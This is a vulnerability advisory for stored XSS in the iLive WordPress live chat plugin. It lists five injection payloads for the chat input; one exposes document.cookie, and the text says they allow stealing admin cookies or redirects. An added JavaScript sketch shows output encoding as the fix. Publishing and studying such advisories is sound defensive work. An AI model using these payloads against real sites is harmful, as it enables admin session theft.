# Exploit Title: iLive - Intelligent WordPress Live Chat Support Plugin v1.0.4 Stored XSS Injection
# Google Dork: -
# Date: 2019/06/25
# Exploit Author: m0ze
# Vendor Homepage:
# Software Link:
# Version: 1.0.4
# Tested on: Windows 10 / Parrot OS
# CVE : -


Weak security measures, such as poor filtering of textarea data, have
been discovered in the «iLive - Intelligent WordPress Live Chat Support
Plugin». The current version of this premium WordPress plugin is 1.0.4.

Go to the demo website and open the chat window by clicking the «Chat» icon in the bottom right corner.
Enter your payload in the input field and press [Enter].
The provided example payloads work in the admin area, so it's possible to steal admin cookies or force a redirect to any other website.
To check your XSS injections, log in and go to this page, then select your chat alias from the list. Keep in mind that there are 3 demo operators, so you must log in as the operator assigned to your chat (the operator number will be available after you send the first message in the chat).

Example #1: <img src= onload=alert(`m0ze`);>
Example #2: <img src=
Example #3: <img src=x onerror=window.location.replace('');>
Example #4: <!--<img src="--><img src=x onerror=(alert)(`m0ze`)//">
Example #5: <!--<img src="--><img src=x onerror=(alert)(document.cookie)//">
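
Mitigation sketch (added example, not the plugin's code and not part of the original advisory): the payloads above fire because stored chat text reaches the operator's admin page as markup, so the fix is to encode it at output time. The function names, the `visitor-1` alias and the `<li>`/`<b>` template are assumptions made for illustration.

```javascript
// Added example. Function names and the <li>/<b> markup are hypothetical;
// the plugin's real rendering code is not shown in the advisory.
const HTML_ESCAPES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;',
  '"': '&quot;', "'": '&#39;', '`': '&#96;',
};

// Encode every character that can open a tag, close an attribute or start an entity.
function escapeHtml(text) {
  return String(text).replace(/[&<>"'`]/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable pattern: stored visitor text is concatenated into markup as-is.
function renderMessageUnsafe(alias, text) {
  return '<li class="chat-msg"><b>' + alias + '</b>: ' + text + '</li>';
}

// Hardened pattern: alias and text are encoded when the page is built.
function renderMessageSafe(alias, text) {
  return '<li class="chat-msg"><b>' + escapeHtml(alias) + '</b>: ' +
    escapeHtml(text) + '</li>';
}

// Rough check: count opening tags or comments other than the template's own.
function injectedTags(html) {
  const tags = html.match(/<[a-zA-Z!][^>]*>/g) || [];
  return tags.filter((t) => t !== '<li class="chat-msg">' && t !== '<b>').length;
}

// Sample stored messages: Example #4 and #5 from this advisory, plus a
// constructed benign line that must survive encoding unchanged in meaning.
const SAMPLES = [
  '<!--<img src="--><img src=x onerror=(alert)(`m0ze`)//">',
  '<!--<img src="--><img src=x onerror=(alert)(document.cookie)//">',
  'Is 2 < 3 & "quoted"?',
];

function checkSamples() {
  return SAMPLES.map((text) => ({
    unsafe: injectedTags(renderMessageUnsafe('visitor-1', text)),
    safe: injectedTags(renderMessageSafe('visitor-1', text)),
  }));
}

console.log(checkSamples());
```

In a WordPress plugin the same encoding step would normally be done server-side with `esc_html()` when the operator page is rendered.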